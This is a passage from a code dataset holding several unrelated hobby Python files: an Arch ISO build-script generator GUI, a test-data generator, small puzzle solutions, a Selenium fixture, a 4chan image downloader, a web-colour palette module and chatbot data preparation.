command\n\tdef on_generate_script(self,widget):\n\n\t\t# ===================== build variables =====================\n\n\t\tv_work_dir = self.txtWorkDir.get_text()\n\t\tv_target_iso_name = self.txtIsoFile.get_text()\n\t\tv_target_username = self.txtUser.get_text()\n\t\tv_target_hostname = self.txtHost.get_text()\n\t\tv_pacman_conf = self.txtPacConf.get_text()\n\t\tv_repo_pkg_list = self.txtPkgRepo.get_text()\n\n\t\tif self.txtPkgBuild.get_text_length() == 0 or self.txtPkgBuild.get_text_length() == 0:\n\t\t\tv_build_pkg_list = \"none\"\n\t\t\tv_builddep_pkg_list = \"none\"\n\t\t\tv_build_pkg_src = \"none\"\n\t\telse:\n\t\t\tif self.txtPkgDirBuild.get_text_length() == 0:\n\t\t\t\tmd = gtk.MessageDialog(None, gtk.DIALOG_DESTROY_WITH_PARENT, gtk.MESSAGE_ERROR, gtk.BUTTONS_CLOSE, \"Build or BuildDeps Package List was set but Directory was empty\")\n\t\t\t\tmd.run()\n\t\t\t\tmd.destroy()\n\t\t\t\treturn\n\t\t\telse:\n\t\t\t\tv_build_pkg_src = self.txtPkgDirBuild.get_text()\n\n\t\t\t\tif self.txtPkgBuild.get_text_length() == 0:\n\t\t\t\t\tv_build_pkg_list = \"none\"\n\t\t\t\telse:\n\t\t\t\t\tv_build_pkg_list = self.txtPkgBuild.get_text()\n\n\t\t\t\tif self.txtPkgBuildDep.get_text_length() == 0:\n\t\t\t\t\tv_builddep_pkg_list = \"none\"\n\t\t\t\telse:\n\t\t\t\t\tv_builddep_pkg_list = self.txtPkgBuildDep.get_text()\n\n\t\tv_arch_iso_src = self.txtBaseIso.get_text()\n\t\tv_db_src = self.txtDbDir.get_text()\n\t\tv_repo_pkg_src = self.txtPkgDirRepo.get_text()\n\n\t\tif self.txtConfScript.get_text_length() == 0:\n\t\t\tv_conf_script = \"none\"\n\t\telse:\n\t\t\tv_conf_script = self.txtConfScript.get_text()\n\n\t\t# ===================== create script strings =====================\n\n\t\tout_script = \"#!/bin/bash \\n\"\n\t\tout_script += \"\\n\"\n\n\t\tif self.rbtArch64.get_active():\n\t\t\tout_script += \"sudo achmadi64 \\\\\\n\"\n\t\t\tout_script += \"$USER \\\\\\n\"\n\n\t\tif self.rbtArch32.get_active():\n\t\t\tout_script += \"sudo achmadi32 \\\\\\n\"\n\t\t\tout_script += \"$USER \\\\\\n\"\n\n\t\tout_script += \"%s \\\\\\n\" % v_work_dir\n\t\tout_script += \"%s \\\\\\n\" % v_target_iso_name\n\t\tout_script += \"%s \\\\\\n\" % v_target_username\n\t\tout_script += \"%s \\\\\\n\" % v_target_hostname\n\t\tout_script += \"%s \\\\\\n\" % v_pacman_conf\n\t\tout_script += \"%s \\\\\\n\" % v_repo_pkg_list\n\t\tout_script += \"%s \\\\\\n\" % v_build_pkg_list\n\t\tout_script += \"%s \\\\\\n\" % v_builddep_pkg_list\n\t\tout_script += \"%s \\\\\\n\" % v_arch_iso_src\n\t\tout_script += \"%s \\\\\\n\" % v_db_src\n\t\tout_script += \"%s \\\\\\n\" % v_repo_pkg_src\n\t\tout_script += \"%s \\\\\\n\" % v_build_pkg_src\n\t\tout_script += \"%s\"\t\t% v_conf_script\n\n\t\t# ===================== write script =====================\n\n\t\tif self.rbtArch64.get_active():\n\t\t\tfile_script = v_work_dir + \"/build64\"\n\t\t\tout_script += \" 2>&1 | tee build64_log.txt\"\n\n\t\tif self.rbtArch32.get_active():\n\t\t\tfile_script = v_work_dir + \"/build32\"\n\t\t\tout_script += \" 2>&1 | tee build32_log.txt\"\n\n\t\ttxt_script = open(file_script, \"w\")\n\t\ttxt_script.write(out_script)\n\t\ttxt_script.close()\n\t\tos.system(\"chmod a+x %s\" % file_script)\n\n\t\tmsg = gtk.MessageDialog(None, gtk.DIALOG_DESTROY_WITH_PARENT, gtk.MESSAGE_INFO,gtk.BUTTONS_OK, \"Script %s generated.\\n\\nPlease double check before run generated script\" % file_script)\n\t\tmsg.run()\n\t\tmsg.destroy()\n\n# ===================== final section =====================\n\nif __name__ == \"__main__\":\n\tapp = ArchBuild()\n\tgtk.main()\n","sub_path":"gui/archbuild.py","file_name":"archbuild.py","file_ext":"py","file_size_in_byte":11223,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"50567209","text":"#!/usr/bin/python3\nfrom cyaron import IO, randint, ati\n\nN = ati([10] * 2 + [3000] * 2 + [1e7] * 6 + [1e10] * 10)\n\nfor t in range(20):\n data = IO(file_prefix='', data_id=t + 1)\n\n T = randint(90, 100)\n data.input_writeln(T)\n for i in range(T):\n if randint(0, 1):\n diff = randint(0, min(randint(0, 10) * 10, N[t] - 1))\n l = randint(1, N[t] - diff)\n r = l + diff\n else:\n l = randint(1, N[t])\n r = randint(l, N[t])\n \n if N[t] == int(1e7):\n r = min(l + int(1e5), r)\n \n if randint(0, 1):\n k = randint(1, 5)\n else:\n k = randint(1, 1000)\n\n data.input_writeln(l, r, k)\n data.output_gen('./c')\n data.close()\n","sub_path":"Online Judges/Nowcoder/[Upload]Contest TG/C Bunny 的函数/data/gen.py","file_name":"gen.py","file_ext":"py","file_size_in_byte":759,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"197554625","text":"# 比较精妙 智力题\ndef increasingTriplet(nums):\n first = second = float('inf')\n for n in nums:\n if n <= first:\n first = n\n elif n <= second:\n second = n\n else:\n return True\n return False\n\n\ntest_nums = [1, 6, 3, 4, 2]\nprint(increasingTriplet(test_nums))","sub_path":"334_IncreasingTripletSubsequence.py","file_name":"334_IncreasingTripletSubsequence.py","file_ext":"py","file_size_in_byte":321,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"118259197","text":"import pytest\r\nfrom selenium import webdriver\r\nfrom Config.config import SetupConfiguration as scd\r\n\r\n@pytest.fixture(params=['firefox'], scope ='function')\r\ndef init_driver(request):\r\n if request.param == 'firefox':\r\n driver = webdriver.Firefox(executable_path=scd.FireFoxInstance)\r\n# if request.param == 'Chrome':\r\n# driver = webdriver.Chrome(executable_path=r'C:\\\\Users\\\\612563313\\\\BTFleet_2020\\\\1.Auto_Fleet\\\\sel_driver\\\\geckodriver-v0.24.0-win64\\\\geckodriver.exe')\r\n# if request.param == 'ie':\r\n# driver = webdriver.Firefox(executable_path=r'C:\\\\Users\\\\612563313\\\\BTFleet_2020\\\\1.Auto_Fleet\\\\sel_driver\\\\geckodriver-v0.24.0-win64\\\\geckodriver.exe')\r\n driver.delete_all_cookies()\r\n driver.get(scd.base_URL)\r\n driver.maximize_window() \r\n request.cls.driver = driver\r\n# yield \r\n# driver.close()\r\n\r\n# #######################Generate HTML report #######################################################\r\n# def pytest_configure(config):\r\n# config._metdata['Project Name']:'Fleet Portal'\r\n# \r\n# @pytest.mark.optionalhook\r\n# def pytest_metadata(metadata):\r\n# metadata.pop(\"JAVA Home\", None)\r\n# metadata.pop(\"Plugins\", None)\r\n\r\n\r\n ","sub_path":"com.myportaltest.rivusfleet/AppTests/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":1212,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"599130367","text":"from time import sleep\nfrom graph.GraphHandler import GraphHandler\n\n\nclass UI:\n\n def mainMenu(self):\n invalidOption = True\n selectedOption = None\n\n while invalidOption:\n print(\"\\t*** Heuristic search in the London tube ***\\n\")\n print(\"Please select an option.\")\n print(\"[1] Search the route between two stations\")\n print(\"[2] exit\")\n try:\n selectedOption = int(input(\"Option: \"))\n print(\"\")\n except:\n print(\"Invalid option selected.\")\n sleep(2)\n continue\n\n if selectedOption > 2 or selectedOption < 1:\n print(\"Invalid option selected.\")\n sleep(2)\n continue\n\n invalidOption = False\n\n return selectedOption\n\n def getStation(self, stage=\"start\"):\n\n invalidStation = True\n selectedStation = None\n graph = GraphHandler()\n\n while invalidStation:\n selectedStation = input(f'Please specify the {stage} station: ')\n\n if not graph.validStation(selectedStation):\n print('Please enter a valid station name.')\n continue\n\n invalidStation = False\n\n selectedStation = graph.getStationsData(selectedStation)\n\n return selectedStation\n\n def getSearchStrategy(self):\n\n invalidSearchStrat = True\n selectedSearchStrat = None\n\n while invalidSearchStrat:\n print(\"Please specify the search strategy that's going to be used.\")\n print(\"[1] Depth-first\")\n print(\"[2] Breadth-first\")\n try:\n selectedSearchStrat = int(input(\"Option: \"))\n print(\"\")\n except:\n print(\"Invalid option selected.\")\n sleep(2)\n continue\n\n if selectedSearchStrat > 2 or selectedSearchStrat < 1:\n print(\"Invalid option selected.\")\n sleep(2)\n continue\n\n invalidSearchStrat = False\n\n return selectedSearchStrat\n\n def getSearchPriority(self):\n\n invalidSearchPriority = True\n selectedSearchPriority = None\n\n while invalidSearchPriority:\n print(\"Please specify the parameter that's going to be prioritized.\")\n print(\"[1] Distance\")\n print(\"[2] Time\")\n try:\n selectedSearchPriority = int(input(\"Option: \"))\n print(\"\")\n except:\n print(\"Invalid option selected.\")\n sleep(2)\n continue\n\n if selectedSearchPriority > 2 or selectedSearchPriority < 1:\n print(\"Invalid option selected.\")\n sleep(2)\n continue\n\n invalidSearchPriority = False\n\n return selectedSearchPriority\n","sub_path":"search/heuristic_search/UserInterface.py","file_name":"UserInterface.py","file_ext":"py","file_size_in_byte":2904,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"418828314","text":"#! python3\r\n# oneechan-downloader.py, a simple script to download all images found in a given 4chan thread\r\n# usage: oneechan-downloader.py [url] OR simply call oneechan-downloader.py with no args to use url in clipboard\r\n\r\nimport sys\r\nimport requests\r\nfrom bs4 import BeautifulSoup\r\nfrom pyperclip import paste\r\nfrom os import makedirs, path\r\n\r\n# check if url arg was given, otherwise use clipboard\r\nif len(sys.argv) > 1:\r\n url = ' '.join(sys.argv[1:])\r\nelse:\r\n url = paste()\r\n\r\n\r\n# pulls thread link from html. this bypasses any issues with 4chanX reformatting or link shortening\r\ndef get_thread():\r\n thread = str(soup.select(\"[rel='canonical']\"))[12:-19]\r\n return thread\r\n\r\n\r\n# create destination folder\r\ndef url_to_dir(url):\r\n thread = url.split('/')\r\n board = thread[3]\r\n thread_num = thread[-2]\r\n dir = f'./{board}/{thread_num}/'\r\n makedirs(dir, exist_ok=True)\r\n return dir\r\n\r\n\r\ndef get_image_links():\r\n image_list = []\r\n raw_links = soup.select('.fileText a')\r\n for item in raw_links:\r\n # removes html formatting and creates a list with just links\r\n image_list.append(str(item).split('\"')[1][2:])\r\n return image_list\r\n\r\n\r\ndef download_files(file_list):\r\n count = 0\r\n for image in file_list:\r\n count += 1\r\n print(f'Downloading image {count} of {len(file_list)}')\r\n res = requests.get(f'http://{image}')\r\n filename = path.basename(image)\r\n current_file = open(destination + filename, 'wb')\r\n for chunk in res.iter_content(100000):\r\n current_file.write(chunk)\r\n current_file.close()\r\n\r\n\r\nprint(f'Loading thread {url}...')\r\n\r\ntry:\r\n r = requests.get(url)\r\n r.raise_for_status()\r\nexcept requests.exceptions.HTTPError as err:\r\n sys.exit(err)\r\n\r\nsoup = BeautifulSoup(r.text, 'html.parser')\r\nthread = get_thread()\r\ndestination = url_to_dir(thread)\r\nfile_list = get_image_links()\r\nprint(f'{len(file_list)} images found.')\r\ndownload_files(file_list)\r\nprint(f'Completed successfully. Images saved to {destination}')\r\ninput('Press enter to exit')\r\n","sub_path":"oneechan-downloader.py","file_name":"oneechan-downloader.py","file_ext":"py","file_size_in_byte":2074,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"143835082","text":"def collatz(number):\n\tlength = 0\n\twhile number > 1:\n\t\tlength += 1\n\t\tif number % 2 == 0:\n\t\t\tnumber /= 2\n\t\telse:\n\t\t\tnumber *= 3\n\t\t\tnumber += 1\n\treturn length\n\nlongestchain = 0\n\nfor x in range(1, 1000001):\n\tprint(x)\n\tl = collatz(x)\n\tif l > longestchain: longestchain = x\n\nprint(longestchain)\n","sub_path":"Python/14.py","file_name":"14.py","file_ext":"py","file_size_in_byte":289,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"323135661","text":"# List of Web Colors (HTML Compatible) in RGB\n# Reference: https://en.wikipedia.org/wiki/Web_colors\n# Importing Shorthand: import pylette_web as clr\nimport colorsys\n\n\ndef rgb2hsv(rgbcolor): # rgbcolor is tuple\n \"\"\"Takes an (r, g, b) tuple and uses Python's colorsys module to convert it to the hsv colorspace.\nReturns a (h, s, v) tuple\"\"\"\n try:\n r, g, b = rgbcolor\n r /= 255\n g /= 255\n b /= 255\n h, s, v = colorsys.rgb_to_hsv(r, g, b)\n h = round(h)\n s = round(s)\n v = round(v)\n return (h, s, v)\n except ValueError:\n print(\"ERROR: expected (r, g, b) tuple, got {} instead.\".format(rgbcolor))\n\n\ndef hsv2rgb(hsvcolor): # hsvcolor is a tuple\n \"\"\"Takes a (h, s, v) tuple and uses Python's colorsys module to convert it to the rgb colorspace.\nReturns an (r, g, b) tuple\"\"\"\n try:\n h, s, v = hsvcolor\n r, g, b = colorsys.hsv_to_rgb(h, s, v)\n r = round(r * 255)\n g = round(g * 255)\n b = round(b * 255)\n except ValueError:\n print(\"ERROR: expected (h, s, v) got {} instead.\".format(rgbcolor))\n\n\ndef rgb2hex(rgbcolor): # rgbcolor is a tuple\n \"\"\"Takes a (h, s, v) tuple and converts it to Hex.\nReturns a hex string.\"\"\"\n try:\n r, g, b = rgbcolor\n def rgbverify(x): return max(0, min(x, 255))\n return \"#{:02x}{:02x}{:02x}\".format(rgbverify(r), rgbverify(g), rgbverify(b))\n except ValueError:\n print(\"ERROR: expected (r, g, b) tuple, got {} instead.\".format(rgbcolor))\n return None\n\n\ndef hex2rgb(hex): # hex is a string\n \"\"\"Takes a hex string and converts it to rgb.\nReturns an (r, g, b) tuple.\"\"\"\n if len(hex) == 7:\n r = int(hex[1:3], 16)\n g = int(hex[3:5], 16)\n b = int(hex[5:7], 16)\n def rgbverify(x): return max(0, min(x, 255))\n return (rgbverify(r), rgbverify(g), rgbverify(b))\n else:\n print(\"Expected String of Length 7: #XXXXXX, got {} instead\".format(hex))\n\n\ndef transparent(rgbcolor, alpha): # alpha is between 0 and 255\n \"\"\"Takes an (r, g, b) tuple and alpha (between 0 and 255).\nReturns a (r, g, b, a) tuple for transparent/translucent colors.\"\"\"\n try:\n r, g, b = rgbcolor\n a = (lambda x: max(0, min(x, 255)))(a)\n return (r, g, b, a)\n except ValueError:\n print(\"ERROR: expected (r, g, b) tuple, got {} instead.\".format(rgbcolor))\n\n\n# Pink Colors:\nPink = (255, 192, 203)\nLightPink = (255, 182, 193)\nHotPink = (255, 105, 180)\nDeepPink = (255, 20, 147)\nPaleVioletRed = (219, 112, 147)\nMediumVioletRed = (199, 21, 133)\nlist_pink = {\n \"Pink\": Pink,\n \"LightPink\": LightPink,\n \"HotPink\": HotPink,\n \"DeepPink\": DeepPink,\n \"PaleVioletRed\": PaleVioletRed,\n \"MediumVioletRed\": MediumVioletRed\n}\n\n# Red Colors:\nLightSalmon = (255, 160, 122)\nSalmon = (250, 128, 114)\nDarkSalmon = (233, 150, 122)\nLightCoral = (240, 128, 128)\nIndianRed = (205, 92, 92)\nCrimson = (220, 20, 60)\nFirebrick = (178, 34, 34)\nDarkRed = (139, 0, 0)\nRed = (255, 0, 0)\nlist_red = {\n \"LightSalmon\": LightSalmon,\n \"Salmon\": Salmon,\n \"DarkSalmon\": DarkSalmon,\n \"LightCoral\": LightCoral,\n \"IndianRed\": IndianRed,\n \"Crimson\": Crimson,\n \"Firebrick\": Firebrick,\n \"DarkRed\": DarkRed,\n \"Red\": Red\n}\n\n# Orange Colors:\nOrangeRed = (255, 69, 0)\nTomato = (255, 99, 71)\nCoral = (255, 127, 80)\nDarkOrange = (255, 140, 0)\nOrange = (255, 165, 0)\nlist_orange = {\n \"OrangeRed\": Orange,\n \"Tomato\": Tomato,\n \"Coral\": Coral,\n \"DarkOrange\": DarkOrange,\n \"Orange\": Orange\n}\n\n# Yellow Colors:\nYellow = (255, 255, 0)\nLightYellow = (255, 255, 224)\nLemonChiffon = (255, 250, 205)\nLightGoldenrodYellow = (250, 250, 210)\nPapayaWhip = (255, 239, 213)\nMoccasin = (255, 228, 181)\nPeachPuff = (255, 218, 185)\nPaleGoldenrod = (238, 232, 170)\nKhaki = (240, 230, 140)\nDarkKhaki = (189, 183, 107)\nGold = (255, 215, 0)\nlist_yellow = {\n \"Yellow\": Yellow,\n \"LightYellow\": LightYellow,\n \"LemonChiffon\": LemonChiffon,\n \"LightGoldenrodYellow\": LightGoldenrodYellow,\n 'PapayaWhip': PapayaWhip,\n \"Moccasin\": Moccasin,\n \"PeachPuff\": PeachPuff,\n \"PaleGoldenrod\": PaleGoldenrod,\n \"Khaki\": Khaki,\n \"DarkKhaki\": DarkKhaki,\n \"Gold\": Gold\n}\n\n# Brown Colors:\nCornsilk = (255, 248, 220)\nBlanchedAlmond = (255, 235, 205)\nBisque = (255, 228, 196)\nNavajoWhite = (255, 222, 173)\nWheat = (245, 222, 179)\nBurlywood = (222, 184, 135)\nTan = (210, 180, 140)\nRosyBrown = (188, 143, 143)\nSandyBrown = (244, 164, 96)\nGoldenrod = (218, 165, 32)\nDarkGoldenrod = (184, 134, 11)\nPeru = (205, 133, 63)\nChocolate = (210, 105, 30)\nSaddleBrown = (139, 69, 19)\nSienna = (160, 82, 45)\nBrown = (165, 42, 42)\nMaroon = (128, 0, 0)\nlist_brown = {\n \"Cornsilk\": Cornsilk,\n \"BlanchedAlmond\": BlanchedAlmond,\n \"Bisque\": Bisque,\n \"NavajoWhite\": NavajoWhite,\n \"Wheat\": Wheat,\n \"Burlywood\": Burlywood,\n \"Tan\": Tan,\n \"RosyBrown\": RosyBrown,\n \"SandyBrown\": SandyBrown,\n \"Goldenrod\": Goldenrod,\n \"DarkGoldenrod\": DarkGoldenrod,\n \"Peru\": Peru,\n \"Chocolate\": Chocolate,\n \"SaddleBrown\": SaddleBrown,\n \"Sienna\": Sienna,\n \"Brown\": Brown,\n \"Maroon\": Maroon,\n}\n\n# Green Colors:\nDarkOliveGreen = (85, 107, 47)\nOlive = (128, 128, 0)\nOliveDrab = (107, 142, 35)\nYellowGreen = (154, 205, 50)\nLimeGreen = (50, 250, 50)\nLime = (0, 255, 0)\nLawnGreen = (124, 252, 0)\nChartreuse = (127, 255, 0)\nGreenYellow = (173, 255, 47)\nSpringGreen = (0, 255, 127)\nMediumSpringGreen = (0, 250, 154)\nLightGreen = (144, 238, 144)\nPaleGreen = (152, 251, 152)\nDarkSeaGreen = (143, 188, 143)\nMediumAquamarine = (102, 205, 170)\nMediumSeaGreen = (60, 179, 113)\nSeaGreen = (46, 139, 87)\nForestGreen = (34, 139, 34)\nGreen = (0, 128, 0)\nDarkGreen = (0, 100, 0)\nlist_green = {\n \"DarkOliveGreen\": DarkOliveGreen,\n \"Olive\": Olive,\n \"OliveDrab\": OliveDrab,\n \"YellowGreen\": YellowGreen,\n \"LimeGreen\": LimeGreen,\n \"Lime\": Lime,\n \"LawnGreen\": LawnGreen,\n \"Chartreuse\": Chartreuse,\n \"GreenYellow\": Green,\n \"SpringGreen\": SpringGreen,\n \"MediumSpringGreen\": MediumSeaGreen,\n \"LightGreen\": LightGreen,\n \"PaleGreen\": PaleGreen,\n \"DarkSeaGreen\": DarkSeaGreen,\n \"MediumAquamarine\": MediumAquamarine,\n \"MediumSeaGreen\": MediumSeaGreen,\n \"SeaGreen\": SeaGreen,\n \"ForestGreen\": ForestGreen,\n \"Green\": Green,\n \"DarkGreen\": DarkGreen\n}\n\n# Cyan Colors:\nAqua = (0, 255, 255)\nCyan = (0, 255, 255)\nLightCyan = (224, 255, 255)\nPaleTurquoise = (175, 238, 238)\nAquamarine = (127, 255, 212)\nTurquoise = (64, 224, 208)\nMediumTurquoise = (72, 209, 204)\nDarkTurquoise = (0, 206, 209)\nLightSeaGreen = (32, 178, 170)\nCadetBlue = (95, 158, 160)\nDarkCyan = (0, 139, 139)\nTeal = (0, 128, 128)\nlist_cyan = {\n \"Aqua\": Aqua,\n \"Cyan\": Cyan,\n \"LightCyan\": LightCyan,\n \"PaleTurquoise\": PaleTurquoise,\n \"Aquamarine\": Aquamarine,\n \"Turquoise\": Turquoise,\n \"MediumTurquoise\": MediumTurquoise,\n \"DarkTurquoise\": DarkTurquoise,\n \"LightSeaGreen\": LightSeaGreen,\n \"CadetBlue\": CadetBlue,\n \"DarkCyan\": DarkCyan,\n \"Teal\": Teal\n}\n\n# Blue Colors:\nLightSteelBlue = (176, 196, 222)\nPowderBlue = (176, 224, 230)\nLightBlue = (173, 216, 230)\nSkyBlue = (135, 206, 235)\nLightSkyBlue = (135, 206, 250)\nDeepSkyBlue = (0, 191, 255)\nDodgerSkyBlue = (30, 144, 255)\nDodgerBlue = (100, 149, 237)\nCornflowerBlue = (100, 149, 237)\nSteelBlue = (70, 130, 180)\nRoyalBlue = (65, 105, 225)\nBlue = (0, 0, 255)\nMediumBlue = (0, 0, 205)\nDarkBlue = (0, 0, 139)\nNavy = (0, 0, 128)\nMidnightBlue = (25, 25, 112)\nlist_blue = {\n \"LightSteelBlue\": LightBlue,\n \"PowderBlue\": PowderBlue,\n \"LightBlue\": LightBlue,\n \"SkyBlue\": SkyBlue,\n \"LightSkyBlue\": LightSkyBlue,\n \"DeepSkyBlue\": DeepSkyBlue,\n \"DodgerSkyBlue\": DodgerSkyBlue,\n \"DodgerBlue\": DodgerBlue,\n \"CornflowerBlue\": CornflowerBlue,\n \"SteelBlue\": SteelBlue,\n \"RoyalBlue\": RoyalBlue,\n \"Blue\": Blue,\n \"MediumBlue\": MediumBlue,\n \"DarkBlue\": DarkBlue,\n \"Navy\": Navy,\n \"MidnightBlue\": MidnightBlue\n}\n\n# Purple, Violet, and Magenta Colors:\nLavender = (230, 230, 250)\nThistle = (216, 191, 216)\nPlum = (221, 160, 221)\nViolet = (238, 130, 238)\nOrchid = (218, 112, 214)\nFuchsia = (255, 0, 255)\nMagenta = (255, 0, 255)\nMediumOrchid = (186, 85, 211)\nMediumPurple = (147, 112, 219)\nBlueViolet = (138, 43, 226)\nDarkViolet = (148, 0, 211)\nDarkOrchid = (153, 50, 204)\nDarkMagenta = (139, 0, 139)\nPurple = (128, 0, 128)\nIndigo = (75, 0, 130)\nDarkSlateBlue = (72, 61, 139)\nSlateBlue = (106, 90, 205)\nMediumSlateBlue = ()\nlist_purple = { # Also Magenta and Violet\n \"Lavender\": Lavender,\n \"Thistle\": Thistle,\n \"Plum\": Plum,\n \"Violet\": Violet,\n \"Orchid\": Orchid,\n \"Fuchsia\": Fuchsia,\n \"Magenta\": Magenta,\n \"MediumOrchid\": MediumOrchid,\n \"MediumPurple\": MediumPurple,\n \"BlueViolet\": BlueViolet,\n \"DarkViolet\": DarkViolet,\n \"DarkOrchid\": DarkOrchid,\n \"DarkMagenta\": DarkMagenta,\n \"Purple\": Purple,\n \"Indigo\": Indigo,\n \"DarkSlateBlue\": DarkSlateBlue,\n \"SlateBlue\": SlateBlue,\n \"MediumSlateBlue\": MediumSlateBlue,\n}\n\n# White Colors:\nWhite = (255, 255, 255)\nSnow = (255, 250, 250)\nHoneydew = (240, 255, 240)\nMintCream = (245, 255, 250)\nAzure = (240, 248, 255)\nAliceBlue = (240, 248, 255)\nGhostWhite = (248, 248, 255)\nWhiteSmoke = (245, 245, 245)\nSeashell = (255, 235, 238)\nBeige = (245, 245, 220)\nOldLace = (253, 245, 230)\nFloralWhite = (255, 250, 240)\nIvory = (255, 255, 240)\nAntiqueWhite = (250, 235, 215)\nLinen = (250, 240, 230)\nLavenderBlush = (255, 240, 245)\nMistyRose = (255, 228, 225)\nlist_white = {\n \"White\": White,\n \"Snow\": Snow,\n \"Honeydew\": Honeydew,\n \"MintCream\": MintCream,\n \"Azure\": Azure,\n \"AliceBlue\": AliceBlue,\n \"GhostWhite\": GhostWhite,\n \"WhiteSmoke\": WhiteSmoke,\n \"Seashell\": Seashell,\n \"Beige\": Beige,\n \"OldLace\": OldLace,\n \"FloralWhite\": FloralWhite,\n \"Ivory\": Ivory,\n \"AntiqueWhite\": AntiqueWhite,\n \"Linen\": Linen,\n \"LavenderBlush\": LavenderBlush,\n \"MistyRose\": MistyRose\n\n}\n\n# Gray and Black Colors:\nGainsboro = (220, 220, 220)\nLightGray = (211, 211, 211)\nSilver = (192, 192, 192)\nDarkGray = (169, 169, 169)\nGray = (128, 128, 128)\nDimGray = (105, 105, 105)\nLightSlateGray = (119, 136, 153)\nSlateGray = (112, 128, 144)\nDarkSlateGray = (47, 79, 79)\nBlack = (0, 0, 0)\nlist_gray = { # Also Black\n \"Gainsboro\": Gainsboro,\n \"LightGray\": LightGray,\n \"Silver\": Silver,\n \"DarkGray\": DarkGray,\n \"Gray\": Gray,\n \"DimGray\": DimGray,\n \"LightSlateGray\": LightSlateGray,\n \"SlateGray\": SlateGray,\n \"DarkSlateGray\": DarkSlateGray,\n \"Black\": Black\n}\n\nlist_colors = {}\nlist_colors.update({**list_pink, **list_red, **list_yellow, **list_brown,\n **list_green, **list_cyan, **list_blue, **list_purple,\n **list_white, **list_gray})\ncheck_colors = {v: k for k, v in list_colors.items()}\n","sub_path":"Python/Module – Pygame/Chapter 1/pylette_web.py","file_name":"pylette_web.py","file_ext":"py","file_size_in_byte":10783,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"546517728","text":"# -*- coding: utf-8 -*-\n\n# Following blog was used for the implementation of the logggin in the application\n#https://realpython.com/python-logging/\nimport logging\nfrom termcolor import colored\n\nclass WorkerLogger:\n \n def __init__(self):\n logging.basicConfig(level=logging.INFO,filename='master_log.log', filemode='a', format=\"%(asctime)s - %(name)s - %(levelname)s - %(message)s\")\n \n def write(self, message, level=\"warning\"):\n \n if level == \"debug\":\n print(colored(message, 'green'))\n logging.debug(message)\n elif level == \"info\":\n print(colored(message, 'white'))\n logging.info(message)\n elif level == \"warning\":\n print(colored(message, 'yellow'))\n logging.warning(message)\n elif level == \"error\":\n print(colored(message, 'red'))\n logging.error(message)\n elif level == \"critical\":\n print(colored(message, 'red'))\n logging.critical(message)\n \n \n \n \n \n \n \n ","sub_path":"logger.py","file_name":"logger.py","file_ext":"py","file_size_in_byte":1076,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"444692397","text":"EN_WHITELIST = '0123456789abcdefghijklmnopqrstuvwxyz ' # space is included in whitelist\nEN_BLACKLIST = '!\"#$%&\\'()*+,-./:;<=>?@[\\\\]^_`{|}~\\''\n\nFILENAME = 'data/chat.txt'\n\nlimit = {\n 'maxq' : 25,\n 'minq' : 2,\n 'maxa' : 25,\n 'mina' : 2\n }\n\nUNK = 'unk'\n# most used vocabulary\nVOCAB_SIZE = 15000\n\n\nimport random\nimport re\n\nimport nltk\nimport itertools\nfrom collections import defaultdict\n\nimport numpy as np\n\nimport pickle\n\n'''\n read twitter dataset\n return two lists(questions and answers)\n'''\n'''\n read lines from file\n return [list of lines]\n'''\ndef read_lines(filename):\n return open(filename, encoding='utf-8').read().split('\\n')[:-1]\n\n'''\n split sentences in one line\n into multiple lines\n return [list of lines]\n'''\ndef split_line(line):\n return line.split('.')\n\n'''\n remove anything that isn't in the vocabulary\n return str(pure ta/en)\n'''\ndef filter_line(line, whitelist):\n return ''.join([ ch for ch in line if ch in whitelist ])\n\n'''\n divide twitter sequences into questions and answers\n return two lists(questions and answers)\n'''\ndef divide_lines(sequences):\n ques, answ = [], []\n\n for i in range(0, len(sequences), 2):\n ques.append(sequences[i])\n answ.append(sequences[i+1])\n\n return ques, answ\n\n'''\n read greeting dataset\n return two list(questions and answers)\n'''\ndef get_greetings():\n ques, answ = [], []\n with open('greetings.txt', 'r', encoding='utf-8') as greet:\n for row, line in enumerate(greet.readlines()):\n line = line[4:].strip('\\n')\n new_line = re.sub(\"[?,.!-]\", \"\", line)\n if row > 2:\n if row % 2 == 1:\n ques.append(new_line)\n else:\n answ.append(new_line)\n return ques, answ\n\n'''\n read history dataset\n return two list(questions and answers)\n'''\ndef get_history():\n ques, answ = [], []\n with open('history.txt', 'r', encoding='utf-8') as hist:\n for row, line in enumerate(hist.readlines()):\n line = line[4:].strip('\\n')\n new_line = re.sub(\"[?,.!-]\", \"\", line)\n if row > 2 and row < 19:\n if row % 2 == 1:\n ques.append(new_line)\n else:\n answ.append(new_line)\n return ques, answ\n\n'''\n read conversation dataset\n return two list(questions and answers)\n'''\ndef get_conversation():\n ques, answ = [], []\n with open('conversation.txt', 'r', encoding='utf-8') as conver:\n question = \"\"\n for row, line in enumerate(conver.readlines()):\n line = line.strip('\\n')\n new_line = re.sub(\"[?,.!-]\", \"\", line)\n if row > 2 and row < 30:\n if new_line[2] != ' ':\n question = new_line[2:]\n else:\n answer = new_line[3:]\n ques.append(question)\n answ.append(answer)\n return ques, answ\n\n'''\n 1. Read from cornell movie dataset 'movie-lines.txt'\n 2. Create a dictionary with ( key = line_id, value = text )\n'''\ndef get_id2line():\n lines=open('raw_data/movie_lines.txt', encoding='utf-8', errors='ignore').read().split('\\n')\n id2line = {}\n for line in lines:\n _line = line.split(' +++$+++ ')\n if len(_line) == 5:\n id2line[_line[0]] = _line[4]\n return id2line\n\n'''\n 1. Read from cornell movie dataset 'movie_conversations.txt'\n 2. Create a list of [list of line_id's]\n'''\ndef get_conversations():\n conv_lines = open('raw_data/movie_conversations.txt', encoding='utf-8', errors='ignore').read().split('\\n')\n convs = [ ]\n for line in conv_lines[:-1]:\n _line = line.split(' 